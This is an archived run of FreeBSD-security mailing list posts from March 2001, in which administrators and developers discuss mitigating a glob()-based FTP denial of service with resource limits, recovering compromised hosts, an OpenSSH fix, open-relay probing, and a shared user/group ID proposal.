for ; Fri, 16 Mar 2001 21:06:42 -0500 (EST) Received: from netscape.com (aimmail10.aim.aol.com [205.188.144.202]) by air-in02.mx.aol.com (v77_r1.21) with ESMTP; Fri, 16 Mar 2001 21:06:42 -0500 Date: Fri, 16 Mar 2001 21:07:10 -0500 From: aykatsue@netscape.net (Eric Estrella) To: FreeBSD-security@freebsd.org Subject: subscribe Mime-Version: 1.0 Message-ID: <592F8E49.1A2894FF.0096C8D3@netscape.net> X-Mailer: Franklin Webmailer 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org __________________________________________________________________ Get your own FREE, personal Netscape Webmail account today at http://webmail.netscape.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 19:16:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 4BE9B37B718 for ; Fri, 16 Mar 2001 19:16:13 -0800 (PST) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 10588 invoked by uid 0); 17 Mar 2001 03:16:11 -0000 Received: from pd950868c.dip.t-dialin.net (HELO speedy.gsinet) (217.80.134.140) by mail.gmx.net (mp020-rz3) with SMTP; 17 Mar 2001 03:16:11 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id VAA28585 for freebsd-security@FreeBSD.ORG; Fri, 16 Mar 2001 21:37:16 +0100 Date: Fri, 16 Mar 2001 21:37:16 +0100 From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: Multiple vendors FTP denial of service Message-ID: <20010316213716.D20830@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from pherman@frenchfries.net on Fri, Mar 16, 2001 at 07:34:22PM +0100 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Mar 16, 2001 at 19:34 +0100, Paul Herman wrote: > > To bad a setusercontext() call couldn't be easily implimented > inside of set[e]uid() (it's in -lutil not -lc). I see too many > FreeBSD admins that believe that their proftpds and qmails are > protected by the limits set in /etc/login.conf. Well, the latter is recommended to be wrapped up in a softlimit(1) invocation. And the former - as well as any other program - could be treated the same. If login.conf isn't easily applied one is still free to make use of ports/sysutils/daemontools. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 23: 6:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailer.progressive-comp.com (docs3.abcrs.com [63.238.77.222]) by hub.freebsd.org (Postfix) with ESMTP id 0C9EB37B718 for ; Fri, 16 Mar 2001 23:06:50 -0800 (PST) (envelope-from docs@mailer.progressive-comp.com) Received: (from docs@localhost) by mailer.progressive-comp.com with id CAA08229; Sat, 17 Mar 2001 02:06:06 -0500 Date: Sat, 17 Mar 2001 02:06:06 -0500 Message-Id: <200103170706.CAA08229@mailer.progressive-comp.com> From: Hank Leininger Reply-To: Hank Leininger To: freebsd-security@FreeBSD.ORG Subject: Re: What's vunerable? X-Shameless-Plug: Check out http://marc.theaimsgroup.com/ X-Warning: This mail posted via a web gateway at marc.theaimsgroup.com X-Warning: Report any violation of list policy to abuse@progressive-comp.com X-Posted-By: Hank Leininger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2001-03-16, Kris Kennaway wrote: > Always be careful trusting the results of automated scanners, because > they can never contain a database of ALL known vulnerabilities, so > your system may have other problems than what's noted there. It may > be useful as a backup to make sure you haven't missed anything, > though. [ I know Kris knows this, just pointing it out... ] s/known//; In particular, as other people have pointed out, if you have any reason to think a box *might* have been compromised, it's not worth your time (if your goal is to get on with life) to do anything but assume it *has* been compromised, and start over. There are too many creative ways that an attacker could have trojan'ed the box once they had free reign for you to ever[*] be sure you've been thorough enough in checking the box out. Once a box falls out of a known-good state, it can't really be put back without starting over, or taking a big chance... [*] A thorough forensic analysis could tell you that the box definitely has been, or probably has not been, compromised. The level of certainty that it hasn't been that you can achieve is directly proportional to how much time (or money) you have to spend on the investigation. Sounds like you have little of either, and don't feel like becoming a forensic expert for the hell of it, so I'd suggest not trying to "prove" to yourself or anyone else that the box(es) are safe, and just replace them/do the rolling rebuilds as have been suggested here. Don't forget to take advantage of this opportunity to remind management how much time and money, in the long run, a proactive approach can save. :-P -- Hank Leininger I say we take off, nuke the site from orbit. Only way to be sure. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 17 2:40:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109]) by hub.freebsd.org (Postfix) with ESMTP id ADB0A37B719 for ; Sat, 17 Mar 2001 02:40:53 -0800 (PST) (envelope-from pherman@frenchfries.net) Received: from husten.security.at12.de (dial-195-14-235-121.netcologne.de [195.14.235.121]) by mr200.netcologne.de (Mirapoint) with ESMTP id ACQ21835; Sat, 17 Mar 2001 11:40:45 +0100 (CET) Received: from localhost (localhost.security.at12.de [127.0.0.1]) by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2HAebK56557; Sat, 17 Mar 2001 11:40:37 +0100 (CET) (envelope-from pherman@frenchfries.net) Date: Sat, 17 Mar 2001 11:40:36 +0100 (CET) From: Paul Herman To: Gerhard Sittig Cc: Subject: Re: Multiple vendors FTP denial of service In-Reply-To: <20010316213716.D20830@speedy.gsinet> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 16 Mar 2001, Gerhard Sittig wrote: > > To bad a setusercontext() call couldn't be easily implimented > > inside of set[e]uid() (it's in -lutil not -lc). I see too many > > FreeBSD admins that believe that their proftpds and qmails are > > protected by the limits set in /etc/login.conf. > > Well, the latter is recommended to be wrapped up in a > softlimit(1) invocation. And the former - as well as any other > program - could be treated the same. > > If login.conf isn't easily applied one is still free to make use > of ports/sysutils/daemontools. Yes, there are many solutions, most of which have already been posted. Thing is, even if you created ports/sysutils/cluestick, many admins would still intuitively believe that limits imposed by /etc/login.conf apply to all processes. The reality that only a select few daemons use /etc/login.conf is admittedly counter-intuitive. Perhaps this is more of a job for TrustedBSD's MAC policies, but it Would Be Nice if resource limits were set along with (e)uid. What do others think? Like I said, this could be done by wraping setusercontext() into setuid(), but it starts to get yucky when mixing userland login_cap functions with a system call. I'd be willing to come up with a patch for this, if it weren't so darn ugly. Would there be a cleaner way to do this? -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 17 3: 6: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 6DF1237B718 for ; Sat, 17 Mar 2001 03:05:58 -0800 (PST) (envelope-from roam@ringworld.nanolink.com) Received: (qmail 22363 invoked by uid 1000); 17 Mar 2001 11:05:15 -0000 Date: Sat, 17 Mar 2001 13:05:15 +0200 From: Peter Pentchev To: Matt Dillon Cc: Paul Herman , "ho-sang, yoon" , freebsd-security@FreeBSD.ORG, Kris Kennaway Subject: Re: Multiple vendors FTP denial of service (fwd) Message-ID: <20010317130515.A20798@ringworld.oblivion.bg> Mail-Followup-To: Matt Dillon , Paul Herman , "ho-sang, yoon" , freebsd-security@FreeBSD.ORG, Kris Kennaway References: <200103162116.f2GLGm674347@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200103162116.f2GLGm674347@earth.backplane.com>; from dillon@earth.backplane.com on Fri, Mar 16, 2001 at 01:16:48PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Mar 16, 2001 at 01:16:48PM -0800, Matt Dillon wrote: > :> > :> I don't think that the resourse limit does effect on this matter. > :> Or, am I something wrong? > : > :I, too, had thought that "max memory size" (or RLIMIT_RSS) would have > :kicked in, but it didn't. However, what does work is setting the > :"datasize" (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds > :RLIMIT_DATA. > : > :Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core. > :I'm perusing through sys/vm now... > : > :-Paul. > > The 'datasize' limit (RLIMIT_DATA) only applies to malloc(). It does > not apply to mmap(). This is a known issue. In anycase, it would depend > on what ftpd uses. I would expect ftpd to use malloc() for internal > structures and perhaps mmap() (or sendfile()) when reading a file. > > The 'memoryuse' limit (RLIMIT_RSS) only applies to the process'es > in-core size. If the process exceeds this value and the machine is > loaded down, the kernel will attempt to swap pages out to get the > process back within the limit. If the machine is mostly idle, the > kernel ignores this limit. > > Currently we have no resource to limit mmap() use. I think in this case it's important to limit exactly malloc(), and definitely NOT mmap(). It's glob(3) that's causing this particular DoS, and it (or, in particular, lib/libc/gen/glob.c's globextend()) uses malloc(). We definitely do not want to limit the maximum filesize that ftpd can transfer - which uses sendfile(); I do not know where sendfile() gets its limits from, but being a syscall, it should not be dependent on RLIMIT_DATA. (well, OK, you probably know what I mean :) G'luck, Peter -- This sentence no verb. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 17 5:44:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from silver.teardrop.org (silver.teardrop.org [205.181.101.128]) by hub.freebsd.org (Postfix) with ESMTP id F1A7437B71A for ; Sat, 17 Mar 2001 05:44:24 -0800 (PST) (envelope-from snow@teardrop.org) Received: (from snow@localhost) by silver.teardrop.org (8.11.2/8.11.1) id f2HDiLd72890; Sat, 17 Mar 2001 08:44:21 -0500 (EST) (envelope-from snow@teardrop.org) Date: Sat, 17 Mar 2001 08:44:21 -0500 From: James Snow To: Peter Pentchev , freebsd-security@freebsd.org Subject: Re: 4.3-BETA, sshd.core found in root directory. Message-ID: <20010317084421.A72802@teardrop.org> References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org> <20010316203238.A8245@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010316203238.A8245@ringworld.oblivion.bg>; from roam@orbitel.bg on Fri, Mar 16, 2001 at 08:32:38PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Mar 16, 2001 at 08:32:38PM +0200, Peter Pentchev wrote: > > I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD, > committed a similar fix earlier today :) Cool. Although, I haven't seen it show up in my source tree yet. Do you know what the fix was? -Snow To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 17 6:12:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 9238937B719 for ; Sat, 17 Mar 2001 06:12:30 -0800 (PST) (envelope-from roam@orbitel.bg) Received: (qmail 86420 invoked by uid 1000); 17 Mar 2001 14:11:24 -0000 Date: Sat, 17 Mar 2001 16:11:23 +0200 From: Peter Pentchev To: James Snow Cc: freebsd-security@freebsd.org Subject: Re: 4.3-BETA, sshd.core found in root directory. Message-ID: <20010317161122.B20798@ringworld.oblivion.bg> Mail-Followup-To: James Snow , freebsd-security@freebsd.org References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org> <20010316203238.A8245@ringworld.oblivion.bg> <20010317084421.A72802@teardrop.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010317084421.A72802@teardrop.org>; from snow@teardrop.org on Sat, Mar 17, 2001 at 08:44:21AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Mar 17, 2001 at 08:44:21AM -0500, James Snow wrote: > On Fri, Mar 16, 2001 at 08:32:38PM +0200, Peter Pentchev wrote: > > > > I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD, > > committed a similar fix earlier today :) > > Cool. Although, I haven't seen it show up in my source tree yet. > > Do you know what the fix was? It has still not shown up in -stable. -current has the fix: http://www.FreeBSD.org/cgi/cvsweb.cgi/src/crypto/openssh/auth2.c Take a look at rev. 1.10. G'luck, Peter -- No language can express every thought unambiguously, least of all this one. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 17 8:21:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 23D9937B718 for ; Sat, 17 Mar 2001 08:21:14 -0800 (PST) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id RAA73701; Sat, 17 Mar 2001 17:21:12 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Per Christian Henden Cc: Subject: Re: weird error messages (at least I don't understand them) References: From: Dag-Erling Smorgrav Date: 17 Mar 2001 17:21:11 +0100 In-Reply-To: Per Christian Henden's message of "Fri, 16 Mar 2001 10:34:41 +0100 (MET)" Message-ID: Lines: 24 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Per Christian Henden writes: > These entries (or something similar) also appears fairly frequently > (I replaced my real dns-name with "my.hostname.domain") > > Checking for rejected mail hosts: > 5 malvix.hist.no > 2 my.hostname.domain > 2 malvix.hist.no@my.hostname.domain > 1 1 1 1 1 <@myhostname.domain:kan2na@malvix.hist.no > > This looks kinda suspicous to me, what could it mean? It means malvix.hist.no is looking for an open relay to spam through. If I were you, I'd check /var/log/maillog* for occurrences of 'malvix', and send those to abuse@hist.no (or ask the admins at NTNU if they know who's in charge of HIST) DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 17 12:16:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id A817937B718 for ; Sat, 17 Mar 2001 12:16:00 -0800 (PST) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 8013 invoked by uid 0); 17 Mar 2001 20:15:59 -0000 Received: from pd950883e.dip.t-dialin.net (HELO speedy.gsinet) (217.80.136.62) by mail.gmx.net (mail05) with SMTP; 17 Mar 2001 20:15:59 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id RAA30352 for freebsd-security@FreeBSD.ORG; Sat, 17 Mar 2001 17:46:41 +0100 Date: Sat, 17 Mar 2001 17:46:41 +0100 From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: Multiple vendors FTP denial of service Message-ID: <20010317174640.F20830@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20010316213716.D20830@speedy.gsinet> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from pherman@frenchfries.net on Sat, Mar 17, 2001 at 11:40:36AM +0100 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Mar 17, 2001 at 11:40 +0100, Paul Herman wrote: > > The reality that only a select few daemons use /etc/login.conf > is admittedly counter-intuitive. Perhaps this is more of a job > for TrustedBSD's MAC policies, but it Would Be Nice if resource > limits were set along with (e)uid. What do others think? > > Like I said, this could be done by wraping setusercontext() > into setuid(), but it starts to get yucky when mixing userland > login_cap functions with a system call. I'd be willing to come > up with a patch for this, if it weren't so darn ugly. > > Would there be a cleaner way to do this? Until there's an aggreed upon and clean solution, would a comment at the top of /etc/login.conf raise attention? Maybe with additional pointers to alternative solutions (wrapper scripts with ulimit(builtin) and softlimit(1), accompanying setrlimit(2) calls next to setuid(2) calls)? --- login.conf 2001/03/17 16:39:33 1.1 +++ login.conf 2001/03/17 16:40:55 @@ -6,6 +6,8 @@ # # This file controls resource limits, accounting limits and # default user environment settings. +# Keep in mind that settings might not always be obeyed +# when daemons change their identity by means of setuid(2) et al. # # $FreeBSD: src/etc/login.conf,v 1.34.2.2 2000/06/02 20:53:55 alfred Exp $ # virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 17 16: 7:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp02.teb1.iconnet.net (smtp02.teb1.iconnet.net [209.3.218.43]) by hub.freebsd.org (Postfix) with ESMTP id 8CFED37B718; Sat, 17 Mar 2001 16:07:27 -0800 (PST) (envelope-from babkin@bellatlantic.net) Received: from bellatlantic.net (client-151-198-135-1.nnj.dialup.bellatlantic.net [151.198.135.1]) by smtp02.teb1.iconnet.net (8.9.1/8.9.1) with ESMTP id TAA20966; Sat, 17 Mar 2001 19:07:24 -0500 (EST) Message-ID: <3AB3FC38.94711FFF@bellatlantic.net> Date: Sat, 17 Mar 2001 19:07:20 -0500 From: Sergey Babkin X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-19990626-CURRENT i386) X-Accept-Language: en, ru MIME-Version: 1.0 To: security@freebsd.org, Wes Peters , Robert Watson , fs@freebsd.org Subject: about common group & user ID space (PR kern/14584) Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org All, I want to commit PR kern/14584. I've been told that it's good to discuss it in -arch, -security and -fs. (It has been sort of discussed on -hackers already, there were not much replies). So I've posted a message on -arch, and now on -security and -fs. I've also discussed this idea shortly with Kirk McKusick at Usenix-2000 at the BSD BOF and he generally liked it and suggested to review further. There is a rather long description in the PR. In short, the idea is that all the IDs above some value get shared by both users and groups. That is, not only two users can't have the same IDs (unless they are just aliases like root and toor) and two groups can't have the same ID, but an user and a group can't have the same ID as well. This allows to use the UID field in the inodes to give permissions in the unified UID&GID space, and thus give two groups (say, "writers" and "readers") different permissions to the file wtihout resorting to trickery with subdirectories. The ID space below this some value is kept separate for UIDs and GIDs for compatibility with the historic IDs. In the patch this feature is enabled by a kernel compilation option, plus even with this option compiled a sysctl has to be set. So it would not affect the unsuspecting users. Why not leave it to the real ACLs ? The problem I see with ACLs is that they break all the standard Unix commands dealing with displaying or storing the permissions, such as ls, tar, cpio and others of this sort. Probably the ACLs are _the_ way to go for the high-security environments. But from my personal experience with systems administration of HP-UX and NetWare in not-so-high-security environments, the careless application of ACLs tends to cause quite a systems administration nighmare. So I personally would avoid them for as long as possible and use only when really neccessary. And that seems to be not only my experience. For example, in UnixWare the ACLs were implemented and then essentially scrapped (never ported to VxFS and left working only as remnants in SFS, a version of FFS with ACLs which does not seem to be used by anyone any more and which may not be used as a root filesystem any more). This is the reason why I think that the classic Unix permissions still have a long live ahead, so some backwards-compatible extensions to them might be quite usable. Any comments are welcome. -SB To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 17 22:32:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp23.singnet.com.sg (smtp23.singnet.com.sg [165.21.101.203]) by hub.freebsd.org (Postfix) with ESMTP id DE7EE37B718 for ; Sat, 17 Mar 2001 22:32:12 -0800 (PST) (envelope-from spades@galaxynet.org) Received: from bryan (ad202.166.106.236.magix.com.sg [202.166.106.236]) by smtp23.singnet.com.sg (8.11.2/8.11.2) with SMTP id f2I6WAe11423 for ; Sun, 18 Mar 2001 14:32:10 +0800 Message-Id: <3.0.32.20010318144200.006c4098@smtp.magix.com.sg> X-Sender: spades@smtp.magix.com.sg X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sun, 18 Mar 2001 14:42:00 +0800 To: freebsd-security@freebsd.org From: Spades Subject: passwd problem Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org # passwd Warning: configuration file missing; please run 'tconf' Unable to update EPS password. Password changed. How do i reinstall passwd or fix this? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 17 23:38:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp10.phx.gblx.net (smtp10.phx.gblx.net [206.165.6.140]) by hub.freebsd.org (Postfix) with ESMTP id BE3BB37B725; Sat, 17 Mar 2001 23:38:51 -0800 (PST) (envelope-from tlambert@usr05.primenet.com) Received: (from daemon@localhost) by smtp10.phx.gblx.net (8.9.3/8.9.3) id AAA96598; Sun, 18 Mar 2001 00:38:34 -0700 Received: from usr05.primenet.com(206.165.6.205) via SMTP by smtp10.phx.gblx.net, id smtpdiFiFMa; Sun Mar 18 00:38:26 2001 Received: (from tlambert@localhost) by usr05.primenet.com (8.8.5/8.8.5) id AAA03250; Sun, 18 Mar 2001 00:38:33 -0700 (MST) From: Terry Lambert Message-Id: <200103180738.AAA03250@usr05.primenet.com> Subject: Re: about common group & user ID space (PR kern/14584) To: babkin@bellatlantic.net (Sergey Babkin) Date: Sun, 18 Mar 2001 07:38:31 +0000 (GMT) Cc: security@FreeBSD.ORG, wes@softweyr.com (Wes Peters), rwatson@FreeBSD.ORG (Robert Watson), fs@FreeBSD.ORG In-Reply-To: <3AB3FC38.94711FFF@bellatlantic.net> from "Sergey Babkin" at Mar 17, 2001 07:07:20 PM X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I want to commit PR kern/14584. I've been told that it's good > to discuss it in -arch, -security and -fs. (It has been sort of > discussed on -hackers already, there were not much replies). > So I've posted a message on -arch, and now on -security and -fs. > I've also discussed this idea shortly with Kirk McKusick at > Usenix-2000 at the BSD BOF and he generally liked it and suggested > to review further. You could do this a bit more cleanly by just stealing the sign bit, and setting if the uid field contained a group ID. There would be no conversion problem for an existing system. The sign bit would not be "stolen", unless the sysctl was in the "active" state. This changes the check to a one line change, conditional on the high bit being set. In trade, the "set group owner" code gets a bit more complicated, but that's in the user space "chown" code, where you have to tell it to set a group, explicitly (so that it will look up the group, not the user, for a non-numeric ID, and set the high bit when stuffing it in the chown id field). Note that this change is really necessary in the user space code anyway: even if you make the UID and GID numeric values not intersect, there is still the possibility of a group and user having the same name, so a set-by-name needs a seperate flag (thing "chown bin.bin foo", for example). The benefits in not having the grovel through the FS contents, or do a more complex ID space transformations, and the moving of the majority of changes to user space, combined with the fact that if you turn it off, the ownership doesn't need to be reverted, are all plusses. Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message